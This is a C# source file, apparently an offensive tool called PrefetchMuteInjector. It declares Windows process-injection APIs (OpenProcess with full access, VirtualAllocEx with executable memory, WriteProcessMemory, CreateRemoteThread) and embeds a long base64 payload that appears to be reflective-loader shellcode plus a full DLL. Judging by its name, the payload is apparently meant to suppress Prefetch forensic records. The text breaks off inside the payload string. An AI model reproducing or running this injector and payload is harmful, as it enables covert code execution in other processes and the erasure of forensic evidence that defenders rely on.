using System;
using NDesk.Options;
using System.IO.Pipes;
using System.Diagnostics;
using System.Collections.Generic;
using System.Runtime.InteropServices;

namespace PrefetchMuteInjector
{
    class PrefetchMuteInjector
    {

        [DllImport("kernel32.dll")]
        public static extern IntPtr CloseHandle(IntPtr hObject);

        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll")]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        const uint PAGE_EXECUTE_READWRITE = 0x00000040;
        const uint MEM_COMMIT = 0x00001000;
        const uint MEM_RESERVE = 0x00002000;
        const int PROCESS_ALL_ACCESS = 0x001FFFFF;


        const string PrefetchHook = "6AAAAABZSYnISIHBCAgAALpFd2IwSYHACE4AAEG5BAAAAFZIieZIg+TwSIPsMMdEJCAAAAAA6AUAAABIifRew0iLxEiJWAhEiUggTIlAGIlQEFVWV0FUQVVBVkFXSI1oqUiB7JAAAABIi/G5THcmB+ijBgAAuUn3AnhIiUW3TIvg6JIGAAC5WKRT5UiJRb9Mi+jogQYAALkQ4YrDTIv46HQGAAC5r7FclEiJRddIi/joYwYAALkzAJ6VSIlF30iL2OhSBgAAuUTwNeBMi/DoRQYAAEUz0kiJRcdNheQPhBYGAABNhe0PhA0GAABNhf8PhAQGAABIhf8PhPsFAABIhdsPhPIFAABNhfYPhOkFAABIhcAPhOAFAABIY348SAP+gT9QRQAAD4XNBQAAuGSGAABmOUcED4W+BQAARItHOEWNWgFFhMMPha0FAAAPt0cGQYvaD7dPFIXAdChIg8EkRIvISAPPi1EEhdJ1B4sRQQPQ6wIDETvTD0faSIPBKE0ry3XiSI1N50H/1otV60SNcv9EA3dQjUL/99BIjUr/RCPwi8NIA8hIjUL/SPfQSCPITDvxD4VABQAASItPMEG5BAAAAEG4ADAAAEGL1kH/10iL2EiFwHUVRI1IBEG4ADAAAEGL1jPJQf/XSIvYRItdf0G+AQAAAEWE3g+EsQAAAItGPIlDPItWPOsLi8pBA9aKBDGIBBk7V1Ry8EUz/0hjezxFi9dIA/tIiX3PD7dHFGZEO38Gcz5MjUcoTAPARYvPRTk4dh9Bi1AEQYtI/EGLwUUDzkgDyEgD0IoEMogEGUU7CHLhD7dHBkUD1kmDwChEO9ByyUyL00wrVzAPhN4AAABEOb+0AAAAD4TRAAAARIuHsAAAAEwDw0U5OA+EvgAAAEG8AgAAAE2NSAjpkwAAAEUz/0GL10Q5f1QPhl3///+LykED1ooEMYgEGTtXVHLw6Uj///9BD7cBD7fIZsHpDGaD+Qp1EUGLCCX/DwAASAPDTAEUAetJZoP5A3UOJf8PAABIjQwDQYvC6y5mQTvOdRUl/w8AAEiNDANJi8JIwegQD7fA6xNmQTvMdRQl/w8AAEiNDANBD7fCQYsQSAEECk0DzEGLQARJA8BMO8h1hk2LwUU5OQ+FTP///0yLZbdEOb+UAAAAD4RFAQAARIuHkAAAAEWL70wDw0mNQAzrB0UD7kiNQBREOTh19EGLw4PgBIlFsw+EggAAAEU77nZ9QcHrEEWNTf9EiV1/RYvfRYXJdG9Ni9BBDxACM9JBi81BK8tp9v1DAwC4/38AAPfxM9KBxsOeJgBBjQwGi8bB6BAl/38AAPfxQQPDRQPeSI0MgEGLVIgQQQ8QDIhBDxEEiEGLQhBBiUSIEEEPEQpBiVIQTY1SFEU72XKc6waLRbOJRX+Lt5AAAABIA/OLRgyFwHR7i31/i8hIA8tB/9REiz5Mi+BEi3YQTAP7TAPzSYsPSIXJdC1Ii32/eQUPt9HrB0iNUQJIA9NJi8z/10mDxwhJiQZJg8YISYsPSIXJddqLfX9FM/9EOX2zdA9Bg/0Bdglpz+gDAAD/VceLRiBIg8YUTItlt4XAdYxIi33PTIttv0Q5v/QAAAB0aESLt/AAAABJg8YETAPz61NBiw5IA8tB/9RBi3YITIvgRYt+DEgD80wD++slSYsPSIXJeQUPt9HrB0iNUQJIA9NJi8xB/9VIiQZIg8YISYPHCDPASDkGddRMi2W3SYPGIEUz/0U5PnWoRYv3D7dHFEG8AQAAAGZEO38GD4PPAAAATIt910iNdzxIA/BFM8lEOU7sD4SgAAAAiw6L0cHqHovBQSPUwegdwekfQSPEdSSF0nUO99lFG8BBg+AHRQPE60/32bgCAAAARRvARCPARAPA6z2F0nUghcl1BkSNQhDrL4XSdRKFyXQIQbiAAAAA6x9Ei0Wv6x2FyXUGRI1BIOsPRItFr4XJuEAAAABED0XARIlFr/cGAAAABHQJQQ+66AlEiUWvi07oTI1Nr4tW7EgDy0H/10UzyQ+3RwZFA/RIg8YoRDvwD4JC////RTP/RTPAM9JIg8n//1XfRDm/1AAAAHQki4fQAAAASIt0GBjrD0UzwEGL1EiLy//QSI12CEiLBkiFwHXpi0coTYvESAPDQYvUSIvL/9CLdWeF9g+ElgAAAEQ5v4wAAAAPhIkAAACLj4gAAABIA8tEi1kYRYXbdHdEOXkUdHFEi0kgQYv/i1EkTAPLSAPTRYXbdFxFiwFFi9dMA8N0UesQD77AQQPCRIvQQcHKDU0DxEGKAITAdelBO/J1BUiF0nUWuAIAAABBA/xIA9BJg8EEQTv7cxrrvItJHA+3EkgDy4sEkYtVd0gDw0iLTW//0EiLw+sCM8BIi5wk0AAAAEiBxJAAAABBX0FeQV1BXF9eXcPMzEiJXCQISIl0JBBXSIPsEGVIiwQlYAAAAIvxSItQGEyLShBNi0EwTYXAD4S0AAAAQQ8QQVhJY0A8M9JNiwnzD38EJEKLnACIAAAAhdt01EiLBCRIwegQRA+30EWF0nQhSItMJAhFi9oPvgHByg2AOWF8A4PC4APQSP/BSYPrAXXnTY0UGDPJQYt6IEkD+EE5Shh2j4sfRTPbSQPYSI1/BA++A0j/w0HByw1EA9iAe/8Ade1BjQQTO8Z0Df/BQTtKGHLR6Vv///9Bi0IkA8lJA8APtxQBQYtKHEkDyIsEkUkDwOsCM8BIi1wkIEiLdCQoSIPEEF/DTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADlu1z4odoyq6HaMquh2jKrqKKhq6vaMqtqtTeqsdoyq2q1Nqqp2jKrarUxqqXaMqtqtTOqp9oyq/qyM6qi2jKrodozq+HaMqsnqjuqo9oyqyeqzaug2jKrJ6owqqDaMqtSaWNoodoyqwAAAAAAAAAAAAAAAAAAAABQRQAAZIYGAIYcZF8AAAAAAAAAAPAAIiALAg4aACAAAAAoAAAAAAAA5CUAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAACQAAAABAAAAAAAAAMAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAABEPwAAyAAAAABwAADgAQAAAGAAAFQDAAAAAAAAAAAAAACAAABQAAAAMDQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgNAAAMAEAAAAAAAAAAAAAADAAABACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAOofAAAAEAAAACAAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACeFwAAADAAAAAYAAAAJAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAWAcAAABQAAAAAgAAADwAAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAFQDAAAAYAAAAAQAAAA+AAAAAAAAAAAAAAAAAABAAABALnJzcmMAAADgAQAAAHAAAAACAAAAQgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAUAAAAACAAAAAAgAAAEQAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiNDVkfAADpbBIAAMzMzMxIjQUxRwAAw8zMzMzMzMzMSIlUJBBMiUQkGEyJTCQgU1ZXSIPsMEiL2kiNdCRgSIv56Mr///9Mi8tIiXQkKEjHw/////9Ix0QkIAAAAABMi8NIi9dIiwhIg8kB/xV3IQAAhcAPSMNIg8QwX15bw8zMQFNIg+wgSIvZSIvCSI0NLSIAAA9XwEiNUwhIiQtIjUgIDxEC/xVWIAAASIvDSIPEIFvDzMzMzMzMzMzMzMzMzEiLUQhIjQVFIgAASIXSSA9FwsPMzMzMzMzMzMzMzMzMSIlcJAhXSIPsIEiNBc8hAABIi/lIiQGL2kiDwQj/FQUgAAD2wwF0DboYAAAASIvP6HsRAABIi1wkMEiLx0iDxCBfw8zMzMzMzMzMzMzMzMxIjQWJIQAASIkBSIPBCEj/JcMfAADMzMzMzMzMzMzMzEiNBdEhAABIx0EQAAAAAEiJQQhIjQWWIQAASIkBSIvBw8zMzMzMzMzMzMzMzMzMzEiD7EhIjUwkIOjC////SI0Vky0AAEiNTCQg6N0aAADMQFNIg+wgSIvZSIvCSI0NDSEAAA9XwEiNUwhIiQtIjUgIDxEC/xU2HwAASI0FLyEAAEiJA0iLw0iDxCBbw8zMzEBTSIPsIEiL2UiLwkiNDc0gAAAPV8BIjVMISIkLSI1ICA8RAv8V9h4AAEiNBccgAABIiQNIi8NIg8QgW8PMzMxIiVwkCEiJbCQQSIl0JBhXQVRBVUFWQVdIg+wwSIsFzT0AAEgzxEiJRCQoSIsN1kQAAEyNLYcBAAC6DQAAAEyNTCQgTYvlTYv9TYv1ScHsCEmL7UnB7xBJi/VJwe4YSYv9SMHtIEmL3UjB7ihEjUIzSMHvMEjB6zj/FWodAABIiw2DRAAATI1MJCS6DQAAAGbHAUm7RIhpAkSIYQNEiHkERIhxBUCIaQZAiHEHQIh5CIhZCWbHQQpB/8ZBDONEi0QkIP8VIB0AAEiLTCQoSDPM6LsLAABIi1wkYEiLbCRoSIt0JHBIg8QwQV9BXkFdQVxfw8zMzMzMzMzMzMzMzMzMQFNWV0FWSIPsOEiLBd88AABIM8RIiUQkKEWL8UGL8EiL+kiL2UyNTCQgujIAAABEjUIOSIsNzkMAAP8VqBwAAEiLDcFDAAAPEAV6QwAADxEBDxANgEMAAA8RSRAPEAWFQwAADxFBIA+3BYpDAABmiUEwTI1MJCBEi0QkILoyAAAA/xVhHAAASIsFekMAAEWLzkSLxkiL10iLy//QkOhe/v//SItMJChIM8zo4QoAAEiDxDhBXl9eW8PMzMzMzMzMQFNVVldBVkFXSIHsWAYAAEiLBRk8AABIM8RIiYQkQAYAAEWL8UjHRCQg9AEAAEyLyUGL6EiL8kiL+UiNTCQwQbj0AQAASI1UJED/FSAdAABIiw0BQwAASb8L16NwPQrXo0yLBehCAABJi8dJK8gz20j36UgD0UjB+gdIi8JIweg/SAPQdFuLw0g70w+GCwEAAEhp0MgAAABIjUwkQEkD0P8VmhwAAEiFwA+FvQAAAEiLDaJCAAD/w0yLBZFCAABJi8dJK8hI9+lIA9FIwfoHSIvCSMHoP0gD0Ehjw0g70HewTI1EJEBIjRWbHgAASI2MJEACAADoRgYAAEiNjCRAAgAA/xU4GwAASI2EJEACAABJx8D/////Zg8fhAAAAAAASf/AQoA8AAB19jPSSI2MJEACAADoaRcAAEWLzkSLxUiL1kiLz+j2/f//M8BIi4wkQAYAAEgzzOh0CQAASIHEWAYAAEFfQV5fXl1bw0yNRCRASI0V6B0AAEiNjCRAAgAA6LsFAABIjYwkQAIAAP8VrRoAAEjHwP/////rsOh/BQAAzMzMzMzMzMzMzMzMzMzMSIlcJAhIiWwkEEiJdCQYSIl8JCBBVkiB7DABAABIiwVcOgAASDPESImEJCABAAD/FYsaAAC6CAAAAEG4aXoAAEiLyEiL2P8VbBoAALoIAAAAQbhpegAASIvLSIkFL0EAAP8VURoAAEUz9kiNDYcdAABMiXQkOEUzwESJdCQwSIvwx0QkKGl6AABFjU4Bx0QkIGl6AABBjVYD/xXhGQAASIvoSIP4/w+EqwEAAA8fQAAz0kiLzf8VFRoAAIXAD4R/AAAASIsNxkAAAEnHwP////9J/8BGODQBdfcz0ugRFgAATI1MJEBMiXQkIEG4BwAAAEiL1kiLzf8VcxkAAIXAdEGLRCRASI0VCB0AAEiLDX1AAABMi85Mi8FEiDQw6G75//9MjUwkQEyJdCQgQbgHAAAASIvWSIvN/xUyGQAAhcB1v0yLBUdAAABBi/5Ji96QQg++DAP/FQ0bAABMiwUuQAAASI1bAf/HQohEA/+D/why3kiNFaMcAABIjUwkUOhtBAAASIsVHkAAAEg7FR9AAAAPhIoAAABIjUQkUA8QAA8RAg8QSBAPEUoQDxBAIA8RQiAPEEgwDxFKMA8QQEAPEUJADxBIUA8RSlAPEEBgDxFCYEiD6oAPEEhwDxFK8A8QgIAAAAAPEQIPEIiQAAAADxFKEA8QgKAAAAAPEUIgDxCIsAAAAA8RSjBIi4DAAAAASIlCQEiBBYk/AADIAAAA6wpMjUQkUOglBAAASIvN/xVkGAAASIsNVT8AAEnHwP////9J/8BGODQBdfcz0uigFAAA6Vn+//8zwEiLjCQgAQAASDPM6LcGAABMjZwkMAEAAEmLWxBJi2sYSYtzIEmLeyhJi+NBXsPMzMzMzMzMzMxIiVwkEEiJbCQYV7hQggwA6MsVAABIK+BIiwXRNwAASDPESImEJECCDABIibQkYIIMAP8VwBcAAEyNTCQgQbgAgAwASIvISI1UJDD/FecXAAAz24XAD4SRAAAAi0QkIIvzSKn4////D4Z/AAAASItsJCBIjXwkMGYPH4QAAAAAADPSSI2MJDCADABBuAQBAADozRMAAP8VXRcAAEiLF0yNhCQwgAwASIvIQbkEAQAA/xVjFwAAhcB0G0iNlCQwgAwASI0NyBoAAOhwFQAAhcB1A0iLL4tMJCD/xkjB6QNIg8cISGPGSDvBcpbrBUiLbCQgSIu0JGCCDAAPH4AAAAAAi/tIjRWXGgAASAP9QbgjAAAASIvP6BcVAACFwHQO/8OB+///DwBy2DPA6zwPEAdIiT3SPQAADxEFiz0AAA8QTxAPEQ2QPQAADxBHIA8RBZU9AAAPt0cwZokFmj0AAOid+P//uAEAAABIi4wkQIIMAEgzzOgYBQAATI2cJFCCDABJi1sYSYtrIEmL41/DzMzMSIHsKAEAAEiLBVI2AABIM8RIiYQkEAEAAIP6AQ+FBwEAAEyNBQ8aAABIiZwkIAEAAEiNFcQZAABIjUwkQOiOAQAASIsVPz0AAEg7FUA9AAAPhIoAAABIjUQkQA8QAA8RAg8QSBAPEUoQDxBAIA8RQiAPEEgwDxFKMA8QQEAPEUJADxBIUA8RSlAPEEBgDxFCYEiD6oAPEEBwDxFC8A8QiIAAAAAPEQoPEICQAAAADxFCEA8QiKAAAAAPEUogDxCAsAAAAA8RQjBIi4DAAAAASIlCQEiBBao8AADIAAAA6wpMjUQkQOhGAQAASI1EJDBFM8lIiUQkKEyNBeL6//8z0sdEJCAAAAAAM8n/FYAVAABIi9joWP3//0iLy/8VXxUAAEiLnCQgAQAAuAEAAABIi4wkEAEAAEgzzOjCAwAASIHEKAEAAMPMzMzMzMzMzMzMSIPsKEiNDfUYAAD/Fc8VAADMzMzMzMzMzMzMzMzMzMxIiVQkEEyJRCQYTIlMJCBTVldIg+wwSIvaSI10JGBIi/noyvT//0iJdCQoTIvLQbgABAAASMdEJCAAAAAASIvXSIsI/xV3FgAAhcC5/////w9IwUiDxDBfXlvDzMzMzMxIiVQkEEyJRCQYTIlMJCBTVldIg+wwSIvaSI10JGBIi/noavT//0iJdCQoTIvLQbjIAAAASMdEJCAAAAAASIvXSIsI/xUXFgAAhcC5/////w9IwUiDxDBfXlvDzMzMzMxAVkFUQVZBV0iD7ChIi8pMi/JJvAvXo3A9CtejSYvwTIsFKjsAAEmLxEkryEm5rkfhehSuRwFI9+lMjTwRSIsNFDsAAEnB/wdJK8hJi8dIweg/TAP4SYvESPfpSAPRSMH6B0iLwkjB6D9IA9BJO9EPhBsCAABIiw3kOgAASYvESSvISIlsJGBIjWoBSPfpSAPRSMH6B0iLwkjB6D9IA9BJi8FIi8pI0elIK8FIO9B2BUiLxesLSI0EEUg7xUgPQsVIiVwkUEiJfCQgSTvBD4fDAQAASGn4yAAAAEiB/wAQAAByKUiNTydIO88PhqYBAADo/wEAAEiFwA+EiwEAAEiNWCdIg+PgSIlD+OsUSIX/dA1Ii8/o2wEAAEiL2OsCM9sPEAZNaf/IAAAATAP7SY2PgAAAAEEPEQcPEE4QQQ8RTxAPEEYgQQ8RRyAPEE4wQQ8RTzAPEEZAQQ8RR0APEE5QQQ8RT1APEEZgQQ8RR2APEEZwDxFB8A8QjoAAAAAPEQkPEIaQAAAADxFBEA8QjqAAAAAPEUkgDxCGsAAAAA8RQTBIi4bAAAAASIlBQEiLy0yLBaI5AABIixWTOQAATTvwdQVMK8LrH02LxkwrwuilEAAATIsFfzkAAEmNj8gAAABNK8ZJi9bojBAAAEyLBV45AABNhcB0UUiLDWI5AABJi8RJK8hI9+lIA9FIwfoHSIvCSMHoP0gD0Ehp0sgAAABIgfoAEAAAchhJi0j4SIPCJ0wrwUmNQPhIg/gfd0xMi8FJi8joaAQAAEhpzcgAAABIi2wkYEmLx0gDy0iJHe84AABIiQ3wOAAASI0MH0iLXCRQSIt8JCBIiQ3jOAAASIPEKEFfQV5BXF7D/xUREwAAzOgLAAAAzOgF8///zMzMzMxIg+woSI0NlRUAAP8VRxIAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzGZmDx+EAAAAAABIOw1ZMQAA8nUSSMHBEGb3wf//8nUC8sNIwckQ6YcHAADMzMxAU0iD7CBIi9nrD0iLy+inDQAAhcB0E0iLy+ihDQAASIXAdOdIg8QgW8NIg/v/dAbotwgAAMzocfL//8xIg+wo6HMKAACFwHQhZUiLBCUwAAAASItICOsFSDvIdBQzwPBID7ENzDEAAHXuMsBIg8Qow7AB6/fMzMxIg+wo6DcKAACFwHQH6IIIAADrGegfCgAAi8joNA0AAIXAdAQywOsH6C0NAACwAUiDxCjDSIPsKDPJ6D0BAACEwA+VwEiDxCjDzMzMSIPsKOhDDQAAhMB1BDLA6xLoNg0AAITAdQfoLQ0AAOvssAFIg8Qow0iD7CjoGw0AAOgWDQAAsAFIg8Qow8zMzEiJXCQISIlsJBBIiXQkGFdIg+wgSYv5SYvwi9pIi+nokAkAAIXAdRaD+wF1EUyLxjPSSIvNSIvH/xUKEgAASItUJFiLTCRQSItcJDBIi2wkOEiLdCRASIPEIF/pYgwAAEiD7CjoSwkAAIXAdBBIjQ3MMAAASIPEKOljDAAA6I4MAACFwHUF6GEMAABIg8Qow0iD7CgzyehxDAAASIPEKOloDAAAQFNIg+wgD7YFhzAAAIXJuwEAAAAPRMOIBXcwAADoQgcAAOhBDAAAhMB1BDLA6xToNAwAAITAdQkzyegpDAAA6+qKw0iDxCBbw8zMzEBTSIPsIIA9PDAAAACL2XVng/kBd2roqQgAAIXAdCiF23UkSI0NJjAAAOi1CwAAhcB1EEiNDS4wAADopQsAAIXAdC4ywOszZg9vBWkRAABIg8j/8w9/BfUvAABIiQX+LwAA8w9/Bf4vAABIiQUHMAAAxgXRLwAAAbABSIPEIFvDuQUAAADoTggAAMzMSIPsGEyLwbhNWgAAZjkFmd7//3V4SGMNzN7//0iNFYne//9IA8qBOVBFAAB1X7gLAgAAZjlBGHVUTCvCD7dBFEiNURhIA9APt0EGSI0MgEyNDMpIiRQkSTvRdBiLSgxMO8FyCotCCAPBTDvAcghIg8Io698z0kiF0nUEMsDrFIN6JAB9BDLA6wqwAesGMsDrAjLASIPEGMNAU0iD7CCK2eiTBwAAM9KFwHQLhNt1B0iHFf4uAABIg8QgW8NAU0iD7CCAPfMuAAAAitl0BITSdQzougoAAIrL6LMKAACwAUiDxCBbw8zMzEBTSIPsIEiDPc4uAAD/SIvZdQfoagoAAOsPSIvTSI0NuC4AAOhNCgAAM9KFwEgPRNNIi8JIg8QgW8PMzEiD7Cjou////0j32BvA99j/yEiDxCjDzOlbCAAAzMzMQFNIg+wgSI0F8w8AAEiL2UiJAfbCAXQKuhgAAADo1v///0iLw0iDxCBbw8xIg+wohdJ0OYPqAXQog+oBdBaD+gF0CrgBAAAASIPEKMPo1vz//+sF6Kf8//8PtsBIg8Qow0mL0EiDxCjpDwAAAE2FwA+VwUiDxCjpGAEAAEiJXCQISIl0JBBIiXwkIEFWSIPsIEiL8kyL8TPJ6Eb9//+EwA+EyAAAAOjN+///itiIRCRAQLcBgz2tLQAAAA+FxQAAAMcFnS0AAAEAAADoGPz//4TAdE/oewgAAOguCAAA6E0IAABIjRXWDgAASI0Nxw4AAOhCCQAAhcB1Kei1+///hMB0IEiNFaYOAABIjQ2PDgAA6BwJAADHBUgtAAACAAAAQDL/isvoKv7//0CE/3U/6BgIAABIi9hIgzgAdCRIi8jod/3//4TAdBhMi8a6AgAAAEmLzkiLA0yLDSoOAABB/9H/BUktAAC4AQAAAOsCM8BIi1wkMEiLdCQ4SIt8JEhIg8QgQV7DuQcAAADoeAUAAJDMzMxIiVwkCFdIg+wwQIr5iwUJLQAAhcB/DTPASItcJEBIg8QwX8P/yIkF8CwAAOiz+v//itiIRCQggz2WLAAAAnU36Mf7///oPgcAAOitBwAAgyV+LAAAAIrL6GP9//8z0kCKz+h9/f//9tgb24PjAejJ+///i8ProrkHAAAA6PMEAACQkMxIi8RIiVggTIlAGIlQEEiJSAhWV0FWSIPsQEmL8Iv6TIvxhdJ1DzkVbCwAAH8HM8Dp7gAAAI1C/4P4AXdFSIsFrA0AAEiFwHUKx0QkMAEAAADrFP8VFw0AAIvYiUQkMIXAD4SyAAAATIvGi9dJi87ooP3//4vYiUQkMIXAD4SXAAAATIvGi9dJi87ocfT//4vYiUQkMIP/AXU2hcB1MkyLxjPSSYvO6FX0//9IhfYPlcHoxv7//0iLBTMNAABIhcB0DkyLxjPSSYvO/xWgDAAAhf90BYP/A3VATIvGi9dJi87oLv3//4vYiUQkMIXAdClIiwX5DAAASIXAdQmNWAGJXCQw6xRMi8aL10mLzv8VXQwAAIvYiUQkMOsGM9uJXCQwi8NIi1wkeEiDxEBBXl9ew8zMzEiJXCQISIl0JBBXSIPsIEmL+IvaSIvxg/oBdQXo8wQAAEyLx4vTSIvOSItcJDBIi3QkOEiDxCBf6Y/+///MzMxAU0iD7CBIi9kzyf8VYwoAAEiLy/8VcgoAAP8V1AkAAEiLyLoJBADASIPEIFtI/yU4CgAASIlMJAhIg+w4uRcAAADocQYAAIXAdAe5AgAAAM0pSI0NcysAAOiqAAAASItEJDhIiQVaLAAASI1EJDhIg8AISIkF6isAAEiLBUMsAABIiQW0KgAASItEJEBIiQW4KwAAxwWOKgAACQQAwMcFiCoAAAEAAADHBZIqAAABAAAAuAgAAABIa8AASI0NiioAAEjHBAECAAAAuAgAAABIa8AASIsNEikAAEiJTAQguAgAAABIa8ABSIsN9SgAAEiJTAQgSI0NiQsAAOgA////SIPEOMPMzMxAU1ZXSIPsQEiL2f8VOwkAAEiLs/gAAAAz/0UzwEiNVCRgSIvO/xVxCQAASIXAdDlIg2QkOABIjUwkaEiLVCRgTIvISIlMJDBMi8ZIjUwkcEiJTCQoM8lIiVwkIP8VMgkAAP/Hg/8CfLFIg8RAX15bw8zMzEiDYRAASI0FPAsAAEiJQQhIjQUhCwAASIkBSIvBw8zMSIPsSEiNTCQg6NL///9IjRWDFgAASI1MJCDonQQAAMxIiVwkEEiJdCQYV0iD7BAzwDPJD6JEi8FFM9tEi8tBgfBudGVsQYHxR2VudUSL0ovwM8lBjUMBRQvID6JBgfJpbmVJiQQkRQvKiVwkBIv5iUwkCIlUJAx1UEiDDd8nAAD/JfA//w89wAYBAHQoPWAGAgB0IT1wBgIAdBoFsPn8/4P4IHckSLkBAAEAAQAAAEgPo8FzFESLBUQuAABBg8gBRIkFOS4AAOsHRIsFMC4AALgHAAAARI1I+zvwfCYzyQ+iiQQkRIvbiVwkBIlMJAiJVCQMD7rjCXMKRQvBRIkF/S0AAMcFSycAAAEAAABEiQ1IJwAAD7rnFA+DkQAAAESJDTMnAAC7BgAAAIkdLCcAAA+65xtzeQ+65xxzczPJDwHQSMHiIEgL0EiJVCQgSItEJCAiwzrDdVeLBf4mAACDyAjHBe0mAAADAAAAiQXrJgAAQfbDIHQ4g8ggxwXUJgAABQAAAIkF0iYAALgAAAPQRCPYRDvYdRhIi0QkICTgPOB1DYMNsyYAAECJHakmAABIi1wkKDPASIt0JDBIg8QQX8PMzMy4AQAAAMPMzDPAOQWcJgAAD5XAw4MlJS0AAADDSIlcJAhVSI2sJED7//9IgezABQAAi9m5FwAAAOgbAwAAhcB0BIvLzSm5AwAAAOjF////M9JIjU3wQbjQBAAA6J4CAABIjU3w/xWKBgAASIud6AAAAEiNldgEAABIi8tFM8D/FcAGAABIhcB0PEiDZCQ4AEiNjeAEAABIi5XYBAAATIvISIlMJDBMi8NIjY3oBAAASIlMJChIjU3wSIlMJCAzyf8VdwYAAEiLhcgEAABIjUwkUEiJhegAAAAz0kiNhcgEAABBuJgAAABIg8AISImFiAAAAOgHAgAASIuFyAQAAEiJRCRgx0QkUBUAAEDHRCRUAQAAAP8VywUAAIP4AUiNRCRQSIlEJEBIjUXwD5TDSIlEJEgzyf8V2gUAAEiNTCRA/xXnBQAAhcB1DITbdQiNSAPov/7//0iLnCTQBQAASIHEwAUAAF3DzMzCAADM6eEBAADMzMxIiVwkIFVIi+xIg+wgSIsFBCUAAEi7MqLfLZkrAABIO8N1dEiDZRgASI1NGP8VfgUAAEiLRRhIiUUQ/xVQBQAAi8BIMUUQ/xU8BQAAi8BIjU0gSDFFEP8VHAUAAItFIEiNTRBIweAgSDNFIEgzRRBIM8FIuf///////wAASCPBSLkzot8tmSsAAEg7w0gPRMFIiQWBJAAASItcJEhI99BIiQVqJAAASIPEIF3DSI0NJSsAAEj/JQYFAADMzEiNDRUrAADpyAAAAEiNBRkrAADDSIPsKOg/5P//SIMIJOjm////SIMIAkiDxCjDzEiNBWUrAADDSIlcJAhXSIPsIEiNHfsOAABIjT30DgAA6xJIiwNIhcB0Bv8VDAYAAEiDwwhIO99y6UiLXCQwSIPEIF/DSIlcJAhXSIPsIEiNHc8OAABIjT3IDgAA6xJIiwNIhcB0Bv8V0AUAAEiDwwhIO99y6UiLXCQwSIPEIF/DzMzMzMzMzMzMzMzM/yXKBAAA/yW0BAAA/yVuBAAA/yWQBAAA/yWaBAAA/yXUBAAA/yXWBAAA/yXwBAAA/yUSBQAA/yUkBQAA/yUWBQAA/yUIBQAA/yXKBAAA/yXsBAAA/yXeBAAA/yXQBAAA/yXCBAAA/yWEBAAA/yW+AwAAzMywAcPMM8DDzEiD7ChNi0E4SIvKSYvR6A0AAAC4AQAAAEiDxCjDzMzMQFNFixhIi9pBg+P4TIvJQfYABEyL0XQTQYtACE1jUAT32EwD0UhjyEwj0Uljw0qLFBBIi0MQi0gISItDCPZEAQMPdAsPtkQBA4Pg8EwDyEwzykmLyVvpSfH//8xIi8RIiVgISIloEEiJcBhIiXggQVZIg+wgSYtZOEiL8k2L8EiL6UmL0UiLzkmL+UyNQwTobP///4tFBCRm9ti4AQAAAEUbwEH32EQDwESFQwR0EUyLz02LxkiL1kiLzeik/v//SItcJDBIi2wkOEiLdCRASIt8JEhIg8QgQV7DzMzMzMzMzMzMzMzMzMzMZmYPH4QAAAAAAEiD7BBMiRQkTIlcJAhNM9tMjVQkGEwr0E0PQtNlTIscJRAAAABNO9PycxdmQYHiAPBNjZsA8P//QcYDAE070/J170yLFCRMi1wkCEiDxBDyw/8luQIAAP8lmwIAAP8lnQMAAMzMzMzMzMzMzMzMzMzMzMzMzMxmZg8fhAAAAAAA/+DMzMzMzMzMzMzMzMzMzMzMzMzMzGZmDx+EAAAAAAD/JXoDAADMzMzMzMzMzMzMSIlUJBBVSIPsIEiL6ki4AAAAAAAAAABIg8QgXcPMQFVIi+pIiwEzyYE4BQAAwA+UwYvBXcPMQFVIg+wgSIvqik1ASIPEIF3p8PL//8xAVUiD7CBIi+qKTSDo3vL//5BIg8QgXcPMQFVIg+wgSIvqSIPEIF3pP/H//8xAVUiD7DBIi+pIiwGLEEiJTCQoiVQkIEyNDXzz//9Mi0Vwi1VoSItNYOiA8P//kEiDxDBdw8xIg+woTIsFxScAAE2FwHRuSIsNyScAAEi4C9ejcD0K16NJK8hI9+lIA9FIwfoHSIvCSMHoP0gD0Ehp0sgAAABIgfoAEAAAchhJi0j4SIPCJ0wrwUmNQPhIg/gfdyZMi8FJi8joyPL//w9X